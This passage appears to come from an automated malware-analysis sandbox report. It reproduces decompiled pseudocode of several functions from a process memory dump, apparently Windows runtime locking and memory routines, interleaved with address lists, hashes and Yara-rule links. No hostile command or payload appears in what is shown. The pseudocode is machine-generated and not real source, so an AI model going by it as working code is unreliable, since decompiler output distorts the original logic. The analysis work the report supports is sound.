							_v1060 = _t118;
							__eflags = _t113;
							if(_t113 == 0) {
								goto L10;
							}
							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
							goto L11;
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t118 - _a20;
						if(_t118 <= _a20) {
							_t114 =  *(_t102 + 4);
							_t77 = _t118;
							goto L26;
						}
						_v1060 = _t118;
						goto L10;
					}
					__eflags = _t122 - 0x80000005;
					if(_t122 != 0x80000005) {
						goto L15;
					}
					L048977F0( *( *[fs:0x30] + 0x18), 0, _t102);
					L18:
					_t121 = _v1060;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t102 =  &_v1036;
				_push(_t102);
				_push(2);
				_push( &_v1048);
				_push(_t116);
				_t122 = E048B9650();
				if(_t122 >= 0) {
					__eflags = 0;
					_v1052 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}










































                          0x0487c608
                          0x0487c615
                          0x0487c625
                          0x0487c62d
                          0x0487c635
                          0x0487c640
                          0x0487c680
                          0x0487c687
                          0x0487c688
                          0x0487c689
                          0x0487c694
                          0x0487c694
                          0x0487c642
                          0x0487c64a
                          0x0487c697
                          0x048e7a25
                          0x048e7a2b
                          0x048e7a2e
                          0x048e7a30
                          0x048e7bea
                          0x048e7bea
                          0x00000000
                          0x048e7bea
                          0x048e7a36
                          0x048e7a43
                          0x048e7a48
                          0x048e7a4c
                          0x048e7a4e
                          0x00000000
                          0x00000000
                          0x048e7a58
                          0x048e7a5a
                          0x048e7a5b
                          0x048e7a5c
                          0x048e7a5d
                          0x048e7a63
                          0x048e7a64
                          0x048e7a6a
                          0x048e7a6c
                          0x048e7a6e
                          0x048e79cb
                          0x048e79cb
                          0x048e79ce
                          0x048e79d0
                          0x048e7a98
                          0x048e7a9b
                          0x048e7a9b
                          0x048e7a9e
                          0x048e7aa1
                          0x048e7bbe
                          0x048e7bbe
                          0x048e7bc0
                          0x048e7be0
                          0x048e7be0
                          0x048e7a01
                          0x048e7a01
                          0x048e7a05
                          0x048e7a07
                          0x048e7a15
                          0x048e7a15
                          0x048e7a1a
                          0x00000000
                          0x048e7a1a
                          0x048e7bc2
                          0x048e7bc6
                          0x048e7bc9
                          0x048e7bcd
                          0x048e7bcf
                          0x048e79e6
                          0x048e79e6
                          0x048e79eb
                          0x048e79eb
                          0x048e79ef
                          0x048e79f1
                          0x00000000
                          0x00000000
                          0x048e79f3
                          0x048e79f5
                          0x048e79ff
                          0x048e79ff
                          0x00000000
                          0x048e79ff
                          0x048e79f7
                          0x048e79fd
                          0x00000000
                          0x00000000
                          0x00000000
                          0x048e79fd
                          0x048e7bd5
                          0x048e7bd8
                          0x00000000
                          0x00000000
                          0x048e7ba9
                          0x048e7bac
                          0x048e7bb0
                          0x048e7bb1
                          0x048e7bb1
                          0x048e7bb6
                          0x00000000
                          0x048e7bb6
                          0x048e7aa7
                          0x048e7aaa
                          0x00000000
                          0x00000000
                          0x048e7ab2
                          0x048e7ab3
                          0x048e7ab5
                          0x048e7aec
                          0x048e7aef
                          0x048e7b25
                          0x048e7b28
                          0x048e7b62
                          0x048e7b64
                          0x048e7b8f
                          0x048e7b92
                          0x048e7b96
                          0x048e7b98
                          0x00000000
                          0x00000000
                          0x048e7b9e
                          0x048e7b9f
                          0x048e7ba3
                          0x00000000
                          0x048e7ba3
                          0x048e7b66
                          0x048e7b68
                          0x048e7ae2
                          0x048e7ae2
                          0x00000000
                          0x048e7ae2
                          0x048e7b6e
                          0x048e7b72
                          0x048e7b75
                          0x048e7b81
                          0x048e7b85
                          0x048e7b87
                          0x00000000
                          0x00000000
                          0x048e7b31
                          0x048e7b34
                          0x048e7b3c
                          0x048e7b45
                          0x048e7b46
                          0x048e7b4f
                          0x048e7b51
                          0x048e7b57
                          0x048e7b59
                          0x048e7b59
                          0x00000000
                          0x048e7b59
                          0x048e7b77
                          0x00000000
                          0x048e7b77
                          0x048e7b2a
                          0x00000000
                          0x048e7b2a
                          0x048e7af1
                          0x048e7af3
                          0x00000000
                          0x00000000
                          0x048e7afb
                          0x048e7afc
                          0x048e7afe
                          0x00000000
                          0x00000000
                          0x048e7b00
                          0x048e7b03
                          0x00000000
                          0x00000000
                          0x048e7b05
                          0x048e7b09
                          0x048e7b0d
                          0x048e7b0f
                          0x00000000
                          0x00000000
                          0x048e7b18
                          0x048e7b1d
                          0x00000000
                          0x048e7b1d
                          0x048e7ab7
                          0x048e7ab9
                          0x00000000
                          0x00000000
                          0x048e7abf
                          0x048e7ac1
                          0x00000000
                          0x00000000
                          0x048e7ac3
                          0x048e7ac6
                          0x00000000
                          0x00000000
                          0x048e7ac8
                          0x048e7acc
                          0x048e7ad0
                          0x048e7ad2
                          0x00000000
                          0x00000000
                          0x048e7adb
                          0x00000000
                          0x048e7adb
                          0x048e79d6
                          0x048e79d9
                          0x048e79dc
                          0x048e7a91
                          0x048e7a94
                          0x00000000
                          0x048e7a94
                          0x048e79e2
                          0x00000000
                          0x048e79e2
                          0x048e7a74
                          0x048e7a7a
                          0x00000000
                          0x00000000
                          0x048e7a8a
                          0x048e7a21
                          0x048e7a21
                          0x00000000
                          0x048e7a21
                          0x0487c650
                          0x0487c651
                          0x0487c656
                          0x0487c65c
                          0x0487c65d
                          0x0487c663
                          0x0487c664
                          0x0487c66a
                          0x0487c66e
                          0x048e79c5
                          0x048e79c7
                          0x00000000
                          0x048e79c7
                          0x0487c67a
                          0x00000000
                          0x00000000
                          0x00000000

                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 98f9c9e9ea7c8768d1e1b4f8151ec8a05a8fa35e284c85a62b1c57ee188c3f12
                          • Instruction ID: 7a5521b20e3c44c9112113a5eba7943b14eb6dcbdfa8cb3a2a4ce775da4c8020
                          • Opcode Fuzzy Hash: 98f9c9e9ea7c8768d1e1b4f8151ec8a05a8fa35e284c85a62b1c57ee188c3f12
                          • Instruction Fuzzy Hash: 1681BE756042459FDB26DE1AC880A7A73E5EF86354F144E2EED45DB240E330FD80DBA2
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0490B8D0, Relevance: .2, Instructions: 199COMMON
                          Download Yara Rule
                          C-Code - Quality: 39%
                          			E0490B8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x4967b9c; // 0x0
				_t124 = L04894620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E048B9800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E048B95B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E048B95D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L048977F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E048B9910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L048977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E048B95D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0x4967b9c; // 0x0
									_t92 = L04894620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E048B9910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L048977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E0487A7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = E0490E7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = E0490E7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E048B95B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}




















                          0x0490b8d9
                          0x0490b8e4
                          0x00000000
                          0x0490b8e6
                          0x0490b8f3
                          0x0490b8f5
                          0x0490b8f5
                          0x0490b8f8
                          0x0490b920
                          0x0490b924
                          0x0490b936
                          0x0490b939
                          0x0490b93d
                          0x0490b948
                          0x0490b9a0
                          0x0490b9a0
                          0x0490b9a4
                          0x0490b9bf
                          0x0490b9c4
                          0x0490b9c6
                          0x0490b9cd
                          0x0490b9d1
                          0x0490bad4
                          0x0490bad8
                          0x0490bada
                          0x0490badc
                          0x0490badc
                          0x0490badf
                          0x0490bae0
                          0x0490bae2
                          0x0490bae4
                          0x0490baec
                          0x0490baee
                          0x0490baf0
                          0x0490baf0
                          0x0490baec
                          0x0490bafb
                          0x0490bafc
                          0x0490bafe
                          0x0490bb01
                          0x0490bb01
                          0x00000000
                          0x0490bb06
                          0x0490b9d7
                          0x0490b9db
                          0x0490b9db
                          0x0490b9de
                          0x0490b9de
                          0x0490b9e4
                          0x0490b9e7
                          0x0490b9ea
                          0x0490b9ec
                          0x0490b9ef
                          0x0490b9f3
                          0x0490ba1b
                          0x0490ba1b
                          0x0490ba23
                          0x0490ba24
                          0x0490ba27
                          0x0490ba2a
                          0x0490ba2b
                          0x0490ba2e
                          0x0490ba30
                          0x0490ba37
                          0x0490ba3f
                          0x0490ba9c
                          0x0490baa2
                          0x0490bb13
                          0x0490bb15
                          0x0490baae
                          0x0490baae
                          0x0490bab3
                          0x0490bab5
                          0x0490baba
                          0x0490bac8
                          0x0490bac8
                          0x0490baba
                          0x0490bacd
                          0x0490bacf
                          0x00000000
                          0x0490bacf
                          0x0490bb1a
                          0x00000000
                          0x0490bb1c
                          0x0490baa7
                          0x0490bb11
                          0x00000000
                          0x0490bb11
                          0x0490baa9
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0490ba41
                          0x0490ba41
                          0x0490ba41
                          0x0490ba58
                          0x0490ba5d
                          0x0490ba62
                          0x00000000
                          0x00000000
                          0x0490ba64
                          0x0490ba67
                          0x0490ba68
                          0x0490ba69
                          0x0490ba6c
                          0x0490ba6f
                          0x0490ba71
                          0x0490ba78
                          0x0490ba80
                          0x00000000
                          0x00000000
                          0x0490ba90
                          0x0490ba90
                          0x0490ba97
                          0x00000000
                          0x0490ba97
                          0x0490b9f5
                          0x0490b9f7
                          0x0490b9f7
                          0x0490b9fa
                          0x0490ba03
                          0x0490ba07
                          0x0490ba0c
                          0x0490ba10
                          0x0490ba17
                          0x00000000
                          0x0490b9f7
                          0x0490b9a6
                          0x0490b9a8
                          0x0490b9af
                          0x0490b9b3
                          0x00000000
                          0x00000000
                          0x0490b9b9
                          0x00000000
                          0x0490b9b9
                          0x0490b94d
                          0x0490b98f
                          0x0490b995
                          0x0490b999
                          0x0490b960
                          0x0490b967
                          0x0490b968
                          0x0490b96a
                          0x00000000
                          0x0490b96a
                          0x0490b99b
                          0x0490b99e
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0490b99e
                          0x0490b951
                          0x0490b954
                          0x0490b95a
                          0x0490b95e
                          0x0490b972
                          0x0490b979
                          0x0490b97d
                          0x0490b97f
                          0x0490b980
                          0x0490b982
                          0x0490b984
                          0x00000000
                          0x0490b984
                          0x00000000
                          0x0490b926
                          0x00000000
                          0x0490b926

                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 18acc324502e2e8c82f94b2ecce5dea03ead3e364c88bb83f44e3b6baba6299f
                          • Instruction ID: cbbdf77f095dfc5f106d90d7f14d084d065de8b40495117238d49566b22547b8
                          • Opcode Fuzzy Hash: 18acc324502e2e8c82f94b2ecce5dea03ead3e364c88bb83f44e3b6baba6299f
                          • Instruction Fuzzy Hash: 0F710332240B05AFEB318F98C840F66B7E9EF44728F148938E655876E0DBB4F940CB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 048752A5, Relevance: .2, Instructions: 161COMMON
                          Download Yara Rule
                          C-Code - Quality: 80%
                          			E048752A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E0488EEF0(0x49679a0);
					_t104 =  *0x4968210; // 0x691e90
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					_t2 = _t104 + 8; // 0x28000000
					 *((intOrPtr*)(_t108 + 0x18)) =  *_t2;
					E0488EB70(_t93, 0x49679a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_t10 = _t104 + 4; // 0x0
							_push( *_t10);
							_t53 = E048B9890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E0488EEF0(0x49679a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E0488EB70(0, 0x49679a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t11 = _t104 + 0xe; // 0x691ea802
								_t13 = _t104 + 0xc; // 0x691e9d
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E048AF0BF(_t13,  *_t11 & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E0488EEF0(0x49679a0);
									__eflags =  *0x4968210 - _t104; // 0x691e90
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x4968210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t37 = _t104 + 0x10; // 0x2000691e
											_t95 =  *((intOrPtr*)( *_t37));
											E048F4888(_t89,  *((intOrPtr*)( *_t37)), __eflags);
										}
										E0488EB70(_t95, 0x49679a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_t38 = _t104 + 4; // 0x0
											_push( *_t38);
											E048B95D0();
											L048977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_t41 = _t104 + 4; // 0x0
											_push( *_t41);
											E048B95D0();
											L048977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E0488EB70(_t93, 0x49679a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_t25 = _t104 + 4; // 0x0
										_push( *_t25);
										E048B95D0();
										L048977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E048B95D0();
										L048977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t15 = _t104 + 0x10; // 0x2000691e
								_t93 =  &_v20;
								_t17 = _t104 + 0xe; // 0x691ea802
								 *((intOrPtr*)(_t108 + 0x20)) =  *_t15;
								_t85 = 6;
								_v20 = _t85;
								_t87 = E048AF0BF( &_v20,  *_t17 & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

























                          0x048752a5
                          0x048752ad
                          0x048752b0
                          0x048752b3
                          0x048752b7
                          0x048752ba
                          0x048752bf
                          0x048752c4
                          0x048752cc
                          0x00000000
                          0x00000000
                          0x048752ce
                          0x048752d1
                          0x048752d9
                          0x048752dd
                          0x048752e7
                          0x048752f7
                          0x048752f9
                          0x048752fd
                          0x048d0dcf
                          0x048d0dd5
                          0x048d0dd6
                          0x048d0dd7
                          0x048d0dd8
                          0x048d0dd9
                          0x048d0dde
                          0x048d0ddf
                          0x048d0de0
                          0x048d0de1
                          0x048d0de2
                          0x048d0de2
                          0x048d0de5
                          0x048d0dea
                          0x048d0dec
                          0x048d0f60
                          0x048d0f64
                          0x048d0f70
                          0x048d0f76
                          0x048d0f79
                          0x048d0f79
                          0x00000000
                          0x048d0f64
                          0x048d0df2
                          0x048d0df7
                          0x048d0e04
                          0x048d0e04
                          0x048d0e0d
                          0x048d0e0d
                          0x048d0e10
                          0x048d0e1a
                          0x048d0e1c
                          0x048d0e4c
                          0x048d0e52
                          0x048d0e61
                          0x048d0e67
                          0x048d0e6b
                          0x048d0e70
                          0x048d0e76
                          0x048d0ed7
                          0x048d0edc
                          0x048d0ee0
                          0x048d0ee6
                          0x048d0eea
                          0x048d0eed
                          0x048d0ef0
                          0x048d0ef3
                          0x048d0ef6
                          0x048d0ef9
                          0x048d0efb
                          0x048d0efe
                          0x048d0f01
                          0x048d0f01
                          0x048d0f0b
                          0x048d0f12
                          0x048d0f16
                          0x048d0f18
                          0x048d0f18
                          0x048d0f1b
                          0x048d0f2c
                          0x048d0f31
                          0x048d0f31
                          0x048d0f35
                          0x048d0f39
                          0x048d0f3a
                          0x048d0f3c
                          0x048d0f3c
                          0x048d0f3f
                          0x048d0f50
                          0x048d0f55
                          0x048d0f55
                          0x048d0f59
                          0x048752eb
                          0x048752f1
                          0x048752f1
                          0x048d0e7d
                          0x048d0e84
                          0x048d0e88
                          0x048d0e8a
                          0x048d0e8a
                          0x048d0e8d
                          0x048d0e9e
                          0x048d0ea3
                          0x048d0ea3
                          0x048d0ea7
                          0x048d0eaf
                          0x048d0eb3
                          0x048d0eb9
                          0x048d0eb9
                          0x048d0ebc
                          0x048d0ecd
                          0x048d0ecd
                          0x00000000
                          0x048d0eb3
                          0x048d0e1e
                          0x048d0e21
                          0x048d0e25
                          0x048d0e2b
                          0x048d0e2f
                          0x048d0e30
                          0x048d0e3a
                          0x048d0e3f
                          0x048d0e41
                          0x00000000
                          0x00000000
                          0x048d0e47
                          0x00000000
                          0x048d0e47
                          0x048d0df9
                          0x048d0dfe
                          0x00000000
                          0x00000000
                          0x00000000
                          0x048d0dfe
                          0x04875303
                          0x04875307
                          0x00000000
                          0x04875309
                          0x00000000
                          0x04875309
                          0x04875307
                          0x048752e9
                          0x048752e9
                          0x00000000
                          0x048752e9
                          0x0487530e
                          0x00000000

                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 19a022458122e8951a1371c64d3b9c63ae9f5f4ac906fab5c48baea6f4bb8cd4
                          • Instruction ID: 5e8b999fac85d2e0f23dd0d52e7ac63f8a2fcb67c06fcbce6a70d6e2b2856c79
                          • Opcode Fuzzy Hash: 19a022458122e8951a1371c64d3b9c63ae9f5f4ac906fab5c48baea6f4bb8cd4
                          • Instruction Fuzzy Hash: C1519B71215745ABE721EF68C844B26BBE4FF85718F144E2EE599C7A50E7B0F800CB92
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0488EF40, Relevance: .1, Instructions: 147COMMON
                          Download Yara Rule
                          C-Code - Quality: 96%
                          			E0488EF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E04879080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t21 = _t90 + 4; // 0x770bc21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E04872D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}




























                          0x0488ef4b
                          0x0488ef4d
                          0x0488ef57
                          0x0488f0bd
                          0x0488f0c2
                          0x0488f0d2
                          0x0488f0d2
                          0x0488f0c2
                          0x0488ef5d
                          0x0488ef5f
                          0x0488ef67
                          0x0488ef6a
                          0x0488ef6d
                          0x0488ef74
                          0x0488ef7f
                          0x0488ef82
                          0x0488ef82
                          0x0488ef86
                          0x0488ef88
                          0x0488ef8c
                          0x0488ef8f
                          0x0488ef8f
                          0x0488ef8f
                          0x00000000
                          0x0488ef91
                          0x0488ef93
                          0x0488efc4
                          0x0488efc4
                          0x0488efc4
                          0x0488efca
                          0x0488efd0
                          0x0488f0a6
                          0x00000000
                          0x00000000
                          0x0488f0af
                          0x048dbb06
                          0x048dbb0a
                          0x0488f0b5
                          0x0488f0b5
                          0x0488f0b5
                          0x0488f0b5
                          0x00000000
                          0x0488efd6
                          0x0488efd9
                          0x0488f0de
                          0x0488f0e2
                          0x0488efdf
                          0x0488efdf
                          0x0488efdf
                          0x0488efe5
                          0x048dbafc
                          0x048dbafc
                          0x0488efe5
                          0x0488efeb
                          0x0488efed
                          0x0488f00f
                          0x0488f011
                          0x0488f01a
                          0x0488f01d
                          0x0488f021
                          0x0488f028
                          0x0488f029
                          0x0488f029
                          0x0488f02c
                          0x00000000
                          0x0488f02c
                          0x0488eff3
                          0x0488eff9
                          0x0488f0ea
                          0x0488f0ed
                          0x0488f0ef
                          0x00000000
                          0x0488f0ef
                          0x0488f003
                          0x048dbb12
                          0x0488f045
                          0x0488f049
                          0x0488f051
                          0x0488f09e
                          0x0488f0a0
